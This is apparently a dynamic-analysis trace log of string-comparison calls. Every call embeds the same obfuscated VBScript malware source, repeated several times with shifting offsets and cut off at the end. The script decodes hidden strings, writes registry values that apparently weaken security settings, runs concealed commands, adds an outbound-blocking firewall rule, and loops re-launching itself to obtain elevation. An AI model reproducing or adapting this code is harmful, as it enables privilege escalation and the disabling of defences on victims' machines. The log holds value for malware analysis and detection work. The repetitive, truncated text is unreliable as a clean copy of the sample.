1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.372] wcsncmp (_String1="XEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0226.372] wcsncmp (_String1="EIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.373] wcsncmp (_String1="IFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.373] wcsncmp (_String1="FAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.373] wcsncmp (_String1="AEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 